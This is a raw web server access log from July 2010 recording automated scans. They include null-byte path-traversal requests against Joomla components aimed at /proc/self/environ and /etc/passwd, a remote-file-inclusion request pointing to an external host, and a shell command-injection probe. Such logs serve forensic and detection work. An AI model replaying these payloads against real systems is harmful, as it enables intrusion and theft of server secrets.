222.124.193.12 - - [27/Jul/2010:20:14:45 +0200] "GET /logs/access_log//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:20:14:46 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.805"
222.124.193.12 - - [27/Jul/2010:20:14:48 +0200] "GET /logs//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.805"
173.236.43.226 - - [27/Jul/2010:20:17:07 +0200] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.834"
173.236.43.226 - - [27/Jul/2010:20:17:08 +0200] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.834"
173.236.43.226 - - [27/Jul/2010:20:18:31 +0200] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.834"
98.130.2.13 - - [27/Jul/2010:20:22:21 +0200] "GET /logs/index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:20:22:21 +0200] "GET /index.php?option=com_jacomment&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:20:38:29 +0200] "GET /logs/access_log//pingserver.php HTTP/1.1" 404 317 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:20:38:29 +0200] "GET /logs/access_log//pingserver.php HTTP/1.1" 404 317 "-" "libwww-perl/5.808"
41.78.28.104 - - [27/Jul/2010:20:38:30 +0200] "GET /logs/access_log//pingserver.php HTTP/1.1" 404 317 "-" "libwww-perl/5.808"
125.141.91.138 - - [27/Jul/2010:20:44:16 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
76.242.100.234 - - [27/Jul/2010:20:45:14 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:20:45:15 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:20:46:01 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:20:46:01 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
209.61.244.6 - - [27/Jul/2010:21:04:25 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.76"
209.61.244.6 - - [27/Jul/2010:21:04:25 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.76"
174.121.192.28 - - [27/Jul/2010:21:08:41 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:21:08:42 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.810"
81.93.3.182 - - [27/Jul/2010:21:08:58 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:21:08:58 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.808"
91.121.67.226 - - [27/Jul/2010:21:09:08 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:21:09:08 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.803"
174.121.192.28 - - [27/Jul/2010:21:09:27 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:21:09:27 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.810"
91.121.67.226 - - [27/Jul/2010:21:09:40 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:21:09:40 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.803"
78.41.233.128 - - [27/Jul/2010:21:09:41 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:21:09:41 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.805"
174.121.192.28 - - [27/Jul/2010:21:09:43 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:21:09:43 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.810"
78.41.233.128 - - [27/Jul/2010:21:09:49 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:21:09:49 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.805"
174.121.192.28 - - [27/Jul/2010:21:09:53 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:21:09:53 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.810"
81.93.3.182 - - [27/Jul/2010:21:09:53 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:21:09:54 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.808"
78.41.233.128 - - [27/Jul/2010:21:09:57 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:21:09:58 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:21:10:04 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:21:10:04 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.805"
91.121.67.226 - - [27/Jul/2010:21:10:10 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:21:10:10 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:21:10:43 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:21:10:43 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.808"
78.41.233.128 - - [27/Jul/2010:21:10:51 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:21:10:51 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.805"
91.121.67.226 - - [27/Jul/2010:21:10:57 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:21:10:57 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:21:12:44 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:21:12:44 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.808"
74.52.6.194 - - [27/Jul/2010:21:13:41 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:21:13:41 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
209.61.244.6 - - [27/Jul/2010:21:14:16 +0200] "GET /logs/access_log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.76"
209.61.244.6 - - [27/Jul/2010:21:14:16 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.76"
209.61.244.6 - - [27/Jul/2010:21:14:17 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.76"
174.121.192.28 - - [27/Jul/2010:21:16:24 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:21:16:25 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.810"
125.141.91.138 - - [27/Jul/2010:21:17:44 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:21:17:45 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:21:17:45 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
81.93.3.182 - - [27/Jul/2010:21:18:04 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:21:18:04 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.808"
78.41.233.128 - - [27/Jul/2010:21:18:13 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:21:18:13 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.805"
91.121.67.226 - - [27/Jul/2010:21:18:36 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:21:18:36 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:21:22:05 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:21:22:05 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:21:22:22 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:21:22:22 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
66.71.245.122 - - [27/Jul/2010:21:44:15 +0200] "GET /logs//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:44:15 +0200] "GET /logs//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:44:16 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:44:16 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:46:13 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:46:13 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
168.143.19.89 - - [27/Jul/2010:21:46:19 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.825"
212.13.195.84 - - [27/Jul/2010:21:46:22 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
66.71.245.122 - - [27/Jul/2010:21:46:29 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:46:43 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
212.13.195.84 - - [27/Jul/2010:21:48:11 +0200] "GET /logs/access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
212.13.195.84 - - [27/Jul/2010:21:48:11 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
212.13.195.84 - - [27/Jul/2010:21:48:11 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
66.71.245.122 - - [27/Jul/2010:21:54:32 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
38.99.96.13 - - [27/Jul/2010:21:56:56 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.99.96.13 - - [27/Jul/2010:21:57:09 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
174.123.133.162 - - [27/Jul/2010:21:57:14 +0200] "GET /logs/mygallerybrowser.php?myPath=http://www.tehuurinutrecht.nl/language/data/id1.jpg?? HTTP/1.1" 404 311 "-" "MaMa CaSpEr"
174.123.133.162 - - [27/Jul/2010:21:57:14 +0200] "GET /logs/access_log%20%20/mygallerybrowser.php?myPath=http://www.tehuurinutrecht.nl/language/data/id1.jpg?? HTTP/1.1" 404 324 "-" "MaMa CaSpEr"
174.123.133.162 - - [27/Jul/2010:21:57:14 +0200] "GET /mygallerybrowser.php?myPath=http://www.tehuurinutrecht.nl/language/data/id1.jpg?? HTTP/1.1" 404 306 "-" "MaMa CaSpEr"
174.123.133.162 - - [27/Jul/2010:21:57:15 +0200] "GET /logs/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 311 "-" "MaMa CaSpEr"
174.123.133.162 - - [27/Jul/2010:21:57:15 +0200] "GET /mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 306 "-" "MaMa CaSpEr"
174.123.133.162 - - [27/Jul/2010:21:57:15 +0200] "GET /logs/access_log%20%20/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 324 "-" "MaMa CaSpEr"
38.99.96.13 - - [27/Jul/2010:21:57:24 +0200] "GET /favicon.ico HTTP/1.1" 404 297 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
66.71.245.122 - - [27/Jul/2010:21:59:38 +0200] "GET /logs/access_log//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:59:38 +0200] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:21:59:38 +0200] "GET /logs//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.831"
168.143.19.89 - - [27/Jul/2010:22:01:57 +0200] "GET /logs/access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.825"
168.143.19.89 - - [27/Jul/2010:22:01:57 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.825"
168.143.19.89 - - [27/Jul/2010:22:01:57 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.825"
84.217.73.155 - - [27/Jul/2010:22:16:48 +0200] "GET /logs/access_log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:22:16:49 +0200] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:22:16:49 +0200] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
66.71.245.122 - - [27/Jul/2010:22:17:04 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
66.71.245.122 - - [27/Jul/2010:22:17:21 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
